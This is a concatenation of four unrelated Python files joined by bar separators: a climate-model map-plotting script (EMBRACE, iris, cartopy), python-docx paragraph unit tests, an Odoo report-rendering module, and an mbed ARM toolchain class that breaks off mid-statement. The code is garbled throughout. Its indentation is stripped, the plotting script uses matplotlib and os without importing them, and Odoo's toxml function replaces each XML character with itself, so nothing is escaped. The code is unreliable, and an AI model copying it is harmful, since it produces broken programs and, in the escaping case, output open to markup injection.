matplotlib.use('Agg')
# Must be before importing matplotlib.pyplot or pylab!
from matplotlib import rc
from matplotlib.font_manager import FontProperties
from matplotlib import rcParams
from mpl_toolkits.basemap import Basemap
rc('font', family = 'serif', serif = 'cmr10')
rc('text', usetex=True)
rcParams['text.usetex']=True
rcParams['text.latex.unicode']=True
rcParams['font.family']='serif'
rcParams['font.serif']='cmr10'
import matplotlib.pyplot as plt
#from matplotlib import figure
import matplotlib as mpl
import matplotlib.cm as mpl_cm
import numpy as np
import iris
import iris.coords as coords
import iris.quickplot as qplt
import iris.plot as iplt
import iris.coord_categorisation
import iris.unit as unit
import cartopy.crs as ccrs
import cartopy.io.img_tiles as cimgt
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import datetime
from mpl_toolkits.basemap import cm
import imp
from textwrap import wrap
import re
import iris.analysis.cartography
import math
from dateutil import tz
#import multiprocessing as mp
import gc
import types
import pdb
save_path='/nfs/a90/eepdw/Figures/EMBRACE/'
model_name_convert_title = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/model_name_convert_title.py')
unrotate = imp.load_source('util', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/unrotate_pole.py')
pp_file_contourf = 'tcwv_mean_by_date_range'
pp_file_contour ='408'
#plot_diags=['sp_hum']
plot_levels = [925]
#experiment_ids = ['dkmbq', 'dklyu']
experiment_ids = ['dklyu', 'dkmbq', 'djzny', 'djznw', 'djznq', 'djzns', 'dklwu', 'dklzq'] # All minus large 2
cb_label='mm'
min_contour=40.
max_contour=70.
tick_interval=5.
clevs = np.linspace(min_contour, max_contour,16)
cmap=plt.cm.jet
ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
pp_file_path = '/nfs/a90/eepdw/Data/EMBRACE/'
degs_crop_top = 1.7
degs_crop_bottom = 2.5
from iris.coord_categorisation import add_categorised_coord
# def add_hour_of_day(cube, coord, name='hour'):
# add_categorised_coord(cube, name, coord,
# lambda coord, x: coord.units.num2date(x).hour)
figprops = dict(figsize=(8,8), dpi=100)
#cmap=cm.s3pcpn_l
u = unit.Unit('hours since 1970-01-01 00:00:00',calendar='gregorian')
dx, dy = 10, 10
divisor=10 # for lat/lon rounding
lon_high = 101.866
lon_low = 64.115
lat_high = 33.
lat_low =-6.79
lon_low_tick=lon_low -(lon_low%divisor)
lon_high_tick=math.ceil(lon_high/divisor)*divisor
lat_low_tick=lat_low - (lat_low%divisor)
lat_high_tick=math.ceil(lat_high/divisor)*divisor
def main():
#clevs_col = np.arange(clev_min, clev_max)
for p_level in plot_levels:
# Set pressure height contour min/max
if p_level == 925:
clev_min = 680.
clev_max = 810.
elif p_level == 850:
clev_min = 1435.
clev_max = 1530.
elif p_level == 700:
clev_min = 3090.
clev_max = 3155.
elif p_level == 500:
clev_min = 5800.
clev_max = 5890.
else:
print 'Contour min/max not set for this pressure level'
# Set potential temperature min/max
if p_level == 925:
clevpt_min = 298.
clevpt_max = 310.
elif p_level == 850:
clevpt_min = 302.
clevpt_max = 312.
elif p_level == 700:
clevpt_min = 312.
clevpt_max = 320.
elif p_level == 500:
clevpt_min = 325.
clevpt_max = 332.
else:
print 'Potential temperature min/max not set for this pressure level'
# Set specific humidity min/max
if p_level == 925:
clevsh_min = 0.012
clevsh_max = 0.020
elif p_level == 850:
clevsh_min = 0.007
clevsh_max = 0.017
elif p_level == 700:
clevsh_min = 0.002
clevsh_max = 0.010
elif p_level == 500:
clevsh_min = 0.001
clevsh_max = 0.005
else:
print 'Specific humidity min/max not set for this pressure level'
clevs_lin = np.arange(clev_min, clev_max, 5)
p_level_constraint = iris.Constraint(pressure=p_level)
#for plot_diag in plot_diags:
for experiment_id in experiment_ids:
expmin1 = experiment_id[:-1]
pfile = '/nfs/a90/eepdw/Data/EMBRACE/%s/%s/%s_%s.pp' % (expmin1, experiment_id, experiment_id, pp_file_contourf)
#pc = iris(pfile)
pcube_contourf = iris.load_cube(pfile)
pcube_contourf=iris.analysis.maths.multiply(pcube_contourf,-1000)
#pdb.set_trace()
height_pp_file = '%s_%s_on_p_levs_mean_by_date_range.pp' % (experiment_id, pp_file_contour)
height_pfile = '%s%s/%s/%s' % (pp_file_path, expmin1, experiment_id, height_pp_file)
pcube_contour = iris.load_cube(height_pfile, p_level_constraint)
time_coords = pcube_contourf.coord('time')
iris.coord_categorisation.add_day_of_year(pcube_contourf, time_coords, name='day_of_year')
time_coords = pcube_contour.coord('time')
iris.coord_categorisation.add_day_of_year(pcube_contour, time_coords, name='day_of_year')
for t, time_cube in enumerate(pcube_contourf.slices(['grid_latitude', 'grid_longitude'])):
#height_cube_slice = pcube_contour.extract(iris.Constraint(day_of_year=time_cube.coord('day_of_year').points))
height_cube_slice = pcube_contour[t]
#pdb.set_trace()
# Get time of averagesfor plot title
h = u.num2date(np.array(time_cube.coord('time').points, dtype=float)[0]).strftime('%d%b')
#Convert to India time
from_zone = tz.gettz('UTC')
to_zone = tz.gettz('Asia/Kolkata')
h_utc = u.num2date(np.array(time_cube.coord('day_of_year').points, dtype=float)[0]).replace(tzinfo=from_zone)
h_local = h_utc.astimezone(to_zone).strftime('%H%M')
fig = plt.figure(**figprops)
#cmap=plt.cm.RdBu_r
ax = plt.axes(projection=ccrs.PlateCarree(), extent=(lon_low,lon_high,lat_low+degs_crop_bottom,lat_high-degs_crop_top))
m =\
Basemap(llcrnrlon=lon_low,llcrnrlat=lat_low,urcrnrlon=lon_high,urcrnrlat=lat_high, rsphere = 6371229)
# lat = pcube_contourf.coord('grid_latitude').points
# lon = pcube_contourf.coord('grid_longitude').points
# cs = cube.coord_system('CoordSystem')
# lons, lats = np.meshgrid(lon, lat)
# lons, lats = iris.analysis.cartography.unrotate_pole\
# (lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)
# x,y = m(lons,lats)
# if plot_diag=='temp':
# min_contour = clevpt_min
# max_contour = clevpt_max
# cb_label='K'
# main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), potential temperature (colours),\
# and wind (vectors) %s UTC %s IST' % (h, h_local)
# tick_interval=2
# clev_number=max_contour-min_contour+1
# elif plot_diag=='sp_hum':
# min_contour = clevsh_min
# max_contour = clevsh_max
# cb_label='kg/kg'
# main_title='8km Explicit model (dklyu) minus 8km parametrised model geopotential height (grey contours), specific humidity (colours),\
# and wind (vectors) %s UTC %s IST' % (h, h_local)
# tick_interval=0.002
# clev_number=max_contour-min_contour+0.001
# clevs = np.linspace(min_contour, max_contour, clev_number)
# #clevs = np.linspace(-3, 3, 32)
# cont = plt.contourf(x,y,time_cube.data, clevs, cmap=cmap, extend='both')
cont = iplt.contourf(time_cube, clevs, cmap=cmap, extend='both')
#pdb.set_trace()
cs_lin = iplt.contour(height_cube_slice, clevs_lin,colors='#262626',linewidths=1.)
plt.clabel(cs_lin, fontsize=14, fmt='%d', color='black')
#del time_cube
#plt.clabel(cont, fmt='%d')
#ax.stock_img()
ax.coastlines(resolution='110m', color='#262626')
gl = ax.gridlines(draw_labels=True,linewidth=0.5, color='#262626', alpha=0.5, linestyle='--')
gl.xlabels_top = False
gl.ylabels_right = False
#gl.xlines = False
dx, dy = 10, 10
gl.xlocator = mticker.FixedLocator(range(int(lon_low_tick),int(lon_high_tick)+dx,dx))
gl.ylocator = mticker.FixedLocator(range(int(lat_low_tick),int(lat_high_tick)+dy,dy))
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
gl.xlabel_style = {'size': 12, 'color':'#262626'}
#gl.xlabel_style = {'color': '#262626', 'weight': 'bold'}
gl.ylabel_style = {'size': 12, 'color':'#262626'}
# cbar = fig.colorbar(cont, orientation='horizontal', pad=0.05, extend='both')
# cbar.set_label('%s' % cb_label, fontsize=10, color='#262626')
# #cbar.set_label(time_cube.units, fontsize=10, color='#262626')
# cbar.set_ticks(np.arange(min_contour, max_contour+tick_interval,tick_interval))
# ticks = (np.arange(min_contour, max_contour+tick_interval,tick_interval))
# cbar.set_ticklabels(['${%.1f}$' % i for i in ticks])
# cbar.ax.tick_params(labelsize=10, color='#262626')
#main_title='Mean Rainfall for EMBRACE Period -%s UTC (%s IST)' % (h, h_local)
#main_title=time_cube.standard_name.title().replace('_',' ')
#model_info = re.sub(r'[(\']', ' ', model_info)
#model_info = re.sub(r'[\',)]', ' ', model_info)
#print model_info
file_save_name = '%s_%s_and_%s_%s_hPa_and_geop_height_%s' % (experiment_id, pp_file_contour, pp_file_contourf, p_level, h)
save_dir = '%s%s/%s_and_%s' % (save_path, experiment_id, pp_file_contour, pp_file_contourf)
if not os.path.exists('%s' % save_dir): os.makedirs('%s' % (save_dir))
#plt.show()
#fig.savefig('%s/%s_notitle.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
plt.title('%s UTC' % (h))
fig.savefig('%s/%s_short_title.png' % (save_dir, file_save_name) , format='png', bbox_inches='tight')
#model_info=re.sub('(.{68} )', '\\1\n', str(model_name_convert_title.main(experiment_id)), 0, re.DOTALL)
#plt.title('\n'.join(wrap('%s\n%s' % (main_title, model_info), 1000,replace_whitespace=False)), fontsize=16)
#fig.savefig('%s/%s.png' % (save_dir, file_save_name), format='png', bbox_inches='tight')
fig.clf()
plt.close()
#del time_cube
gc.collect()
if __name__ == '__main__':
main()
#proc=mp.Process(target=worker)
#proc.daemon=True
#proc.start()
#proc.join()
|
|
# encoding: utf-8
"""Unit test suite for the docx.text.paragraph module"""
from __future__ import absolute_import, division, print_function, unicode_literals
from docx.enum.style import WD_STYLE_TYPE
from docx.enum.text import WD_ALIGN_PARAGRAPH
from docx.oxml.text.paragraph import CT_P
from docx.oxml.text.run import CT_R
from docx.parts.document import DocumentPart
from docx.text.paragraph import Paragraph
from docx.text.parfmt import ParagraphFormat
from docx.text.run import Run
import pytest
from ..unitutil.cxml import element, xml
from ..unitutil.mock import (
call, class_mock, instance_mock, method_mock, property_mock
)
class DescribeParagraph(object):
def it_knows_its_paragraph_style(self, style_get_fixture):
paragraph, style_id_, style_ = style_get_fixture
style = paragraph.style
paragraph.part.get_style.assert_called_once_with(
style_id_, WD_STYLE_TYPE.PARAGRAPH
)
assert style is style_
def it_can_change_its_paragraph_style(self, style_set_fixture):
paragraph, value, expected_xml = style_set_fixture
paragraph.style = value
paragraph.part.get_style_id.assert_called_once_with(
value, WD_STYLE_TYPE.PARAGRAPH
)
assert paragraph._p.xml == expected_xml
def it_knows_the_text_it_contains(self, text_get_fixture):
paragraph, expected_text = text_get_fixture
assert paragraph.text == expected_text
def it_can_replace_the_text_it_contains(self, text_set_fixture):
paragraph, text, expected_text = text_set_fixture
paragraph.text = text
assert paragraph.text == expected_text
def it_knows_its_alignment_value(self, alignment_get_fixture):
paragraph, expected_value = alignment_get_fixture
assert paragraph.alignment == expected_value
def it_can_change_its_alignment_value(self, alignment_set_fixture):
paragraph, value, expected_xml = alignment_set_fixture
paragraph.alignment = value
assert paragraph._p.xml == expected_xml
def it_provides_access_to_its_paragraph_format(self, parfmt_fixture):
paragraph, ParagraphFormat_, paragraph_format_ = parfmt_fixture
paragraph_format = paragraph.paragraph_format
ParagraphFormat_.assert_called_once_with(paragraph._element)
assert paragraph_format is paragraph_format_
def it_provides_access_to_the_runs_it_contains(self, runs_fixture):
paragraph, Run_, r_, r_2_, run_, run_2_ = runs_fixture
runs = paragraph.runs
assert Run_.mock_calls == [
call(r_, paragraph), call(r_2_, paragraph)
]
assert runs == [run_, run_2_]
def it_can_add_a_run_to_itself(self, add_run_fixture):
paragraph, text, style, style_prop_, expected_xml = add_run_fixture
run = paragraph.add_run(text, style)
assert paragraph._p.xml == expected_xml
assert isinstance(run, Run)
assert run._r is paragraph._p.r_lst[0]
if style:
style_prop_.assert_called_once_with(style)
def it_can_insert_a_paragraph_before_itself(self, insert_before_fixture):
text, style, paragraph_, add_run_calls = insert_before_fixture
paragraph = Paragraph(None, None)
new_paragraph = paragraph.insert_paragraph_before(text, style)
paragraph._insert_paragraph_before.assert_called_once_with(paragraph)
assert new_paragraph.add_run.call_args_list == add_run_calls
assert new_paragraph.style == style
assert new_paragraph is paragraph_
def it_can_remove_its_content_while_preserving_formatting(
self, clear_fixture):
paragraph, expected_xml = clear_fixture
_paragraph = paragraph.clear()
assert paragraph._p.xml == expected_xml
assert _paragraph is paragraph
def it_inserts_a_paragraph_before_to_help(self, _insert_before_fixture):
paragraph, body, expected_xml = _insert_before_fixture
new_paragraph = paragraph._insert_paragraph_before()
assert isinstance(new_paragraph, Paragraph)
assert body.xml == expected_xml
# fixtures -------------------------------------------------------
@pytest.fixture(params=[
('w:p', None, None, 'w:p/w:r'),
('w:p', 'foobar', None, 'w:p/w:r/w:t"foobar"'),
('w:p', None, 'Strong', 'w:p/w:r'),
('w:p', 'foobar', 'Strong', 'w:p/w:r/w:t"foobar"'),
])
def add_run_fixture(self, request, run_style_prop_):
before_cxml, text, style, after_cxml = request.param
paragraph = Paragraph(element(before_cxml), None)
expected_xml = xml(after_cxml)
return paragraph, text, style, run_style_prop_, expected_xml
@pytest.fixture(params=[
('w:p/w:pPr/w:jc{w:val=center}', WD_ALIGN_PARAGRAPH.CENTER),
('w:p', None),
])
def alignment_get_fixture(self, request):
cxml, expected_alignment_value = request.param
paragraph = Paragraph(element(cxml), None)
return paragraph, expected_alignment_value
@pytest.fixture(params=[
('w:p', WD_ALIGN_PARAGRAPH.LEFT,
'w:p/w:pPr/w:jc{w:val=left}'),
('w:p/w:pPr/w:jc{w:val=left}', WD_ALIGN_PARAGRAPH.CENTER,
'w:p/w:pPr/w:jc{w:val=center}'),
('w:p/w:pPr/w:jc{w:val=left}', None,
'w:p/w:pPr'),
('w:p', None, 'w:p/w:pPr'),
])
def alignment_set_fixture(self, request):
initial_cxml, new_alignment_value, expected_cxml = request.param
paragraph = Paragraph(element(initial_cxml), None)
expected_xml = xml(expected_cxml)
return paragraph, new_alignment_value, expected_xml
@pytest.fixture(params=[
('w:p', 'w:p'),
('w:p/w:pPr', 'w:p/w:pPr'),
('w:p/w:r/w:t"foobar"', 'w:p'),
('w:p/(w:pPr, w:r/w:t"foobar")', 'w:p/w:pPr'),
])
def clear_fixture(self, request):
initial_cxml, expected_cxml = request.param
paragraph = Paragraph(element(initial_cxml), None)
expected_xml = xml(expected_cxml)
return paragraph, expected_xml
@pytest.fixture(params=[
(None, None),
('Foo', None),
(None, 'Bar'),
('Foo', 'Bar'),
])
def insert_before_fixture(self, request, _insert_paragraph_before_, add_run_):
text, style = request.param
paragraph_ = _insert_paragraph_before_.return_value
add_run_calls = [] if text is None else [call(text)]
paragraph_.style = None
return text, style, paragraph_, add_run_calls
@pytest.fixture(params=[
('w:body/w:p{id=42}', 'w:body/(w:p,w:p{id=42})')
])
def _insert_before_fixture(self, request):
body_cxml, expected_cxml = request.param
body = element(body_cxml)
paragraph = Paragraph(body[0], None)
expected_xml = xml(expected_cxml)
return paragraph, body, expected_xml
@pytest.fixture
def parfmt_fixture(self, ParagraphFormat_, paragraph_format_):
paragraph = Paragraph(element('w:p'), None)
return paragraph, ParagraphFormat_, paragraph_format_
@pytest.fixture
def runs_fixture(self, p_, Run_, r_, r_2_, runs_):
paragraph = Paragraph(p_, None)
run_, run_2_ = runs_
return paragraph, Run_, r_, r_2_, run_, run_2_
@pytest.fixture
def style_get_fixture(self, part_prop_):
style_id = 'Foobar'
p_cxml = 'w:p/w:pPr/w:pStyle{w:val=%s}' % style_id
paragraph = Paragraph(element(p_cxml), None)
style_ = part_prop_.return_value.get_style.return_value
return paragraph, style_id, style_
@pytest.fixture(params=[
('w:p', 'Heading 1', 'Heading1',
'w:p/w:pPr/w:pStyle{w:val=Heading1}'),
('w:p/w:pPr', 'Heading 1', 'Heading1',
'w:p/w:pPr/w:pStyle{w:val=Heading1}'),
('w:p/w:pPr/w:pStyle{w:val=Heading1}', 'Heading 2', 'Heading2',
'w:p/w:pPr/w:pStyle{w:val=Heading2}'),
('w:p/w:pPr/w:pStyle{w:val=Heading1}', 'Normal', None,
'w:p/w:pPr'),
('w:p', None, None,
'w:p/w:pPr'),
])
def style_set_fixture(self, request, part_prop_):
p_cxml, value, style_id, expected_cxml = request.param
paragraph = Paragraph(element(p_cxml), None)
part_prop_.return_value.get_style_id.return_value = style_id
expected_xml = xml(expected_cxml)
return paragraph, value, expected_xml
@pytest.fixture(params=[
('w:p', ''),
('w:p/w:r', ''),
('w:p/w:r/w:t', ''),
('w:p/w:r/w:t"foo"', 'foo'),
('w:p/w:r/(w:t"foo", w:t"bar")', 'foobar'),
('w:p/w:r/(w:t"fo ", w:t"bar")', 'fo bar'),
('w:p/w:r/(w:t"foo", w:tab, w:t"bar")', 'foo\tbar'),
('w:p/w:r/(w:t"foo", w:br, w:t"bar")', 'foo\nbar'),
('w:p/w:r/(w:t"foo", w:cr, w:t"bar")', 'foo\nbar'),
])
def text_get_fixture(self, request):
p_cxml, expected_text_value = request.param
paragraph = Paragraph(element(p_cxml), None)
return paragraph, expected_text_value
@pytest.fixture
def text_set_fixture(self):
paragraph = Paragraph(element('w:p'), None)
paragraph.add_run('must not appear in result')
new_text_value = 'foo\tbar\rbaz\n'
expected_text_value = 'foo\tbar\nbaz\n'
return paragraph, new_text_value, expected_text_value
# fixture components ---------------------------------------------
@pytest.fixture
def add_run_(self, request):
return method_mock(request, Paragraph, 'add_run')
@pytest.fixture
def document_part_(self, request):
return instance_mock(request, DocumentPart)
@pytest.fixture
def _insert_paragraph_before_(self, request):
return method_mock(request, Paragraph, '_insert_paragraph_before')
@pytest.fixture
def p_(self, request, r_, r_2_):
return instance_mock(request, CT_P, r_lst=(r_, r_2_))
@pytest.fixture
def ParagraphFormat_(self, request, paragraph_format_):
return class_mock(
request, 'docx.text.paragraph.ParagraphFormat',
return_value=paragraph_format_
)
@pytest.fixture
def paragraph_format_(self, request):
return instance_mock(request, ParagraphFormat)
@pytest.fixture
def part_prop_(self, request, document_part_):
return property_mock(
request, Paragraph, 'part', return_value=document_part_
)
@pytest.fixture
def Run_(self, request, runs_):
run_, run_2_ = runs_
return class_mock(
request, 'docx.text.paragraph.Run', side_effect=[run_, run_2_]
)
@pytest.fixture
def r_(self, request):
return instance_mock(request, CT_R)
@pytest.fixture
def r_2_(self, request):
return instance_mock(request, CT_R)
@pytest.fixture
def run_style_prop_(self, request):
return property_mock(request, Run, 'style')
@pytest.fixture
def runs_(self, request):
run_ = instance_mock(request, Run, name='run_')
run_2_ = instance_mock(request, Run, name='run_2_')
return run_, run_2_
|
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import os
import re
from lxml import etree
import openerp
import openerp.tools as tools
import openerp.modules
import print_xml
import render
import urllib
from openerp import SUPERUSER_ID
from openerp.report.render.rml2pdf import customfonts
#
# coerce any type to a unicode string (to preserve non-ascii characters)
# and escape XML entities
#
def toxml(value):
unicode_value = tools.ustr(value)
return unicode_value.replace('&', '&').replace('<','<').replace('>','>')
class report_int(object):
_reports = {}
def __init__(self, name, register=True):
if register:
assert openerp.conf.deprecation.allow_report_int_registration
assert name.startswith('report.'), 'Report names should start with "report.".'
assert name not in self._reports, 'The report "%s" already exists.' % name
self._reports[name] = self
else:
# The report is instanciated at each use site, which is ok.
pass
self.__name = name
self.name = name
self.id = 0
self.name2 = '.'.join(name.split('.')[1:])
# TODO the reports have methods with a 'title' kwarg that is redundant with this attribute
self.title = None
def create(self, cr, uid, ids, datas, context=None):
return False
class report_rml(report_int):
"""
Automatically builds a document using the transformation process:
XML -> DATAS -> RML -> PDF -> HTML
using a XSL:RML transformation
"""
def __init__(self, name, table, tmpl, xsl, register=True):
super(report_rml, self).__init__(name, register=register)
self.table = table
self.internal_header=False
self.tmpl = tmpl
self.xsl = xsl
self.bin_datas = {}
self.generators = {
'pdf': self.create_pdf,
'html': self.create_html,
'raw': self.create_raw,
'sxw': self.create_sxw,
'txt': self.create_txt,
'odt': self.create_odt,
'html2html' : self.create_html2html,
'makohtml2html' :self.create_makohtml2html,
}
def create(self, cr, uid, ids, datas, context):
registry = openerp.registry(cr.dbname)
xml = self.create_xml(cr, uid, ids, datas, context)
xml = tools.ustr(xml).encode('utf8')
report_type = datas.get('report_type', 'pdf')
if report_type == 'raw':
return xml, report_type
registry['res.font'].font_scan(cr, SUPERUSER_ID, lazy=True, context=context)
rml = self.create_rml(cr, xml, uid, context)
ir_actions_report_xml_obj = registry['ir.actions.report.xml']
report_xml_ids = ir_actions_report_xml_obj.search(cr, uid, [('report_name', '=', self.name[7:])], context=context)
self.title = report_xml_ids and ir_actions_report_xml_obj.browse(cr,uid,report_xml_ids)[0].name or 'OpenERP Report'
create_doc = self.generators[report_type]
pdf = create_doc(rml, title=self.title)
return pdf, report_type
def create_xml(self, cr, uid, ids, datas, context=None):
if not context:
context={}
doc = print_xml.document(cr, uid, datas, {})
self.bin_datas.update( doc.bin_datas or {})
doc.parse(self.tmpl, ids, self.table, context)
xml = doc.xml_get()
doc.close()
return self.post_process_xml_data(cr, uid, xml, context)
def post_process_xml_data(self, cr, uid, xml, context=None):
if not context:
context={}
# find the position of the 3rd tag
# (skip the <?xml ...?> and the "root" tag)
iter = re.finditer('<[^>]*>', xml)
i = iter.next()
i = iter.next()
pos_xml = i.end()
doc = print_xml.document(cr, uid, {}, {})
tmpl_path = openerp.modules.get_module_resource('base', 'report', 'corporate_defaults.xml')
doc.parse(tmpl_path, [uid], 'res.users', context)
corporate_header = doc.xml_get()
doc.close()
# find the position of the tag after the <?xml ...?> tag
iter = re.finditer('<[^>]*>', corporate_header)
i = iter.next()
pos_header = i.end()
return xml[:pos_xml] + corporate_header[pos_header:] + xml[pos_xml:]
#
# TODO: The translation doesn't work for "<tag t="1">textext<tag> tex</tag>text</tag>"
#
def create_rml(self, cr, xml, uid, context=None):
if self.tmpl=='' and not self.internal_header:
self.internal_header=True
if not context:
context={}
registry = openerp.registry(cr.dbname)
ir_translation_obj = registry['ir.translation']
# In some case we might not use xsl ...
if not self.xsl:
return xml
stylesheet_file = tools.file_open(self.xsl)
try:
stylesheet = etree.parse(stylesheet_file)
xsl_path, _ = os.path.split(self.xsl)
for import_child in stylesheet.findall('./import'):
if 'href' in import_child.attrib:
imp_file = import_child.get('href')
_, imp_file = tools.file_open(imp_file, subdir=xsl_path, pathinfo=True)
import_child.set('href', urllib.quote(str(imp_file)))
imp_file.close()
finally:
stylesheet_file.close()
#TODO: get all the translation in one query. That means we have to:
# * build a list of items to translate,
# * issue the query to translate them,
# * (re)build/update the stylesheet with the translated items
def translate(doc, lang):
translate_aux(doc, lang, False)
def translate_aux(doc, lang, t):
for node in doc:
t = t or node.get("t")
if t:
text = None
tail = None
if node.text:
text = node.text.strip().replace('\n',' ')
if node.tail:
tail = node.tail.strip().replace('\n',' ')
if text:
translation1 = ir_translation_obj._get_source(cr, uid, self.name2, 'xsl', lang, text)
if translation1:
node.text = node.text.replace(text, translation1)
if tail:
translation2 = ir_translation_obj._get_source(cr, uid, self.name2, 'xsl', lang, tail)
if translation2:
node.tail = node.tail.replace(tail, translation2)
translate_aux(node, lang, t)
if context.get('lang', False):
translate(stylesheet.iter(), context['lang'])
transform = etree.XSLT(stylesheet)
xml = etree.tostring(
transform(etree.fromstring(xml)))
return xml
def create_pdf(self, rml, localcontext = None, logo=None, title=None):
if not localcontext:
localcontext = {}
localcontext.update({'internal_header':self.internal_header})
if logo:
self.bin_datas['logo'] = logo
else:
if 'logo' in self.bin_datas:
del self.bin_datas['logo']
obj = render.rml(rml, localcontext, self.bin_datas, self._get_path(), title)
obj.render()
return obj.get()
def create_html(self, rml, localcontext = None, logo=None, title=None):
obj = render.rml2html(rml, localcontext, self.bin_datas)
obj.render()
return obj.get()
def create_txt(self, rml,localcontext, logo=None, title=None):
obj = render.rml2txt(rml, localcontext, self.bin_datas)
obj.render()
return obj.get().encode('utf-8')
def create_html2html(self, rml, localcontext = None, logo=None, title=None):
obj = render.html2html(rml, localcontext, self.bin_datas)
obj.render()
return obj.get()
def create_raw(self,rml, localcontext = None, logo=None, title=None):
obj = render.odt2odt(etree.XML(rml),localcontext)
obj.render()
return etree.tostring(obj.get())
def create_sxw(self,rml,localcontext = None):
obj = render.odt2odt(rml,localcontext)
obj.render()
return obj.get()
def create_odt(self,rml,localcontext = None):
obj = render.odt2odt(rml,localcontext)
obj.render()
return obj.get()
def create_makohtml2html(self,html,localcontext = None):
obj = render.makohtml2html(html,localcontext)
obj.render()
return obj.get()
def _get_path(self):
return [
self.tmpl.replace(os.path.sep, '/').rsplit('/', 1)[0],
'addons',
tools.config['root_path']
]
|
|
"""
mbed SDK
Copyright (c) 2011-2019 ARM Limited
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function, absolute_import
from builtins import str # noqa: F401
import re
from copy import copy
from os.path import join, dirname, splitext, basename, exists, isfile, relpath, sep
from os import makedirs, write, remove
from tempfile import mkstemp
from shutil import rmtree
from distutils.version import LooseVersion
from tools.toolchains.mbed_toolchain import (
mbedToolchain, TOOLCHAIN_PATHS, should_replace_small_c_lib
)
from tools.utils import mkdir, NotSupportedException, run_cmd
from tools.resources import FileRef
ARMC5_MIGRATION_WARNING = (
"Warning: Arm Compiler 5 is no longer supported as of Mbed 6. "
"Please upgrade your environment to Arm Compiler 6 "
"which is free to use with Mbed OS. For more information, "
"please visit https://os.mbed.com/docs/mbed-os/latest/tools/index.html"
)
UARM_TOOLCHAIN_WARNING = (
"Warning: We noticed that you are using uARM Toolchain either via --toolchain command line or default_toolchain option. "
"We are deprecating the use of the uARM Toolchain. "
"For more information on how to use the ARM toolchain with small C libraries, "
"please visit https://os.mbed.com/docs/mbed-os/latest/reference/using-small-c-libraries.html"
)
class ARM(mbedToolchain):
LINKER_EXT = '.sct'
LIBRARY_EXT = '.ar'
STD_LIB_NAME = "%s.ar"
DIAGNOSTIC_PATTERN = re.compile('"(?P<file>[^"]+)", line (?P<line>\d+)( \(column (?P<column>\d+)\)|): (?P<severity>Warning|Error|Fatal error): (?P<message>.+)')
INDEX_PATTERN = re.compile('(?P<col>\s*)\^')
DEP_PATTERN = re.compile('\S+:\s(?P<file>.+)\n')
SHEBANG = "#! armcc -E"
SUPPORTED_CORES = [
"Cortex-M0", "Cortex-M0+", "Cortex-M3", "Cortex-M4", "Cortex-M4F",
"Cortex-M7", "Cortex-M7F", "Cortex-M7FD", "Cortex-A5", "Cortex-A9"
]
ARMCC_RANGE = (LooseVersion("5.06"), LooseVersion("5.07"))
ARMCC_PRODUCT_RE = re.compile(b"Product: (.*)")
ARMCC_VERSION_RE = re.compile(b"Component: ARM Compiler (\d+\.\d+)")
@staticmethod
def check_executable():
"""Returns True if the executable (armcc) location specified by the
user exists OR the executable can be found on the PATH.
Returns False otherwise."""
return mbedToolchain.generic_check_executable("ARM", 'armcc', 2, 'bin')
def __init__(self, target, notify=None, macros=None,
build_profile=None, build_dir=None, coverage_patterns=None):
mbedToolchain.__init__(
self, target, notify, macros, build_dir=build_dir,
build_profile=build_profile)
if target.core not in self.SUPPORTED_CORES:
raise NotSupportedException(
"this compiler does not support the core %s" % target.core)
toolchain = "arm"
if should_replace_small_c_lib(target, toolchain):
target.c_lib = "std"
self.check_c_lib_supported(target, toolchain)
if (
getattr(target, "default_toolchain", "ARM") == "uARM"
or getattr(target, "c_lib", "std") == "small"
):
if "-DMBED_RTOS_SINGLE_THREAD" not in self.flags['common']:
self.flags['common'].append("-DMBED_RTOS_SINGLE_THREAD")
if "-D__MICROLIB" not in self.flags['common']:
self.flags['common'].append("-D__MICROLIB")
if "--library_type=microlib" not in self.flags['ld']:
self.flags['ld'].append("--library_type=microlib")
if "--library_type=microlib" not in self.flags['common']:
self.flags['common'].append("--library_type=microlib")
self.check_and_add_minimal_printf(target)
cpu = {
"Cortex-M0+": "Cortex-M0plus",
"Cortex-M4F": "Cortex-M4.fp.sp",
"Cortex-M7F": "Cortex-M7.fp.sp",
"Cortex-M7FD": "Cortex-M7.fp.dp"}.get(target.core, target.core)
ARM_BIN = join(TOOLCHAIN_PATHS['ARM'], "bin")
main_cc = join(ARM_BIN, "armcc")
self.flags['common'] += ["--cpu=%s" % cpu]
self.asm = [main_cc] + self.flags['common'] + self.flags['asm']
self.cc = [main_cc] + self.flags['common'] + self.flags['c']
self.cppc = (
[main_cc] + self.flags['common'] +
self.flags['c'] + self.flags['cxx']
)
self.ld = [join(ARM_BIN, "armlink")] + self.flags['ld']
self.ar = join(ARM_BIN, "armar")
self.elf2bin = join(ARM_BIN, "fromelf")
self.SHEBANG += " --cpu=%s" % cpu
self.product_name = None
def version_check(self):
# The --ide=mbed removes an instability with checking the version of
# the ARMC6 binary that comes with Mbed Studio.
# NOTE: the --ide=mbed argument is only for use with Mbed OS
stdout, _, retcode = run_cmd(
[self.cc[0], "--vsn", "--ide=mbed"],
redirect=True
)
msg = None
min_ver, max_ver = self.ARMCC_RANGE
output = stdout.encode("utf-8")
match = self.ARMCC_VERSION_RE.search(output)
if match:
found_version = LooseVersion(match.group(1).decode("utf-8"))
else:
found_version = None
min_ver, max_ver = self.ARMCC_RANGE
if found_version and (found_version < min_ver
or found_version >= max_ver):
msg = ("Compiler version mismatch: Have {}; "
"expected version >= {} and < {}"
.format(found_version, min_ver, max_ver))
elif not match or len(match.groups()) != 1:
msg = ("Compiler version mismatch: Could not detect version; "
"expected version >= {} and < {}"
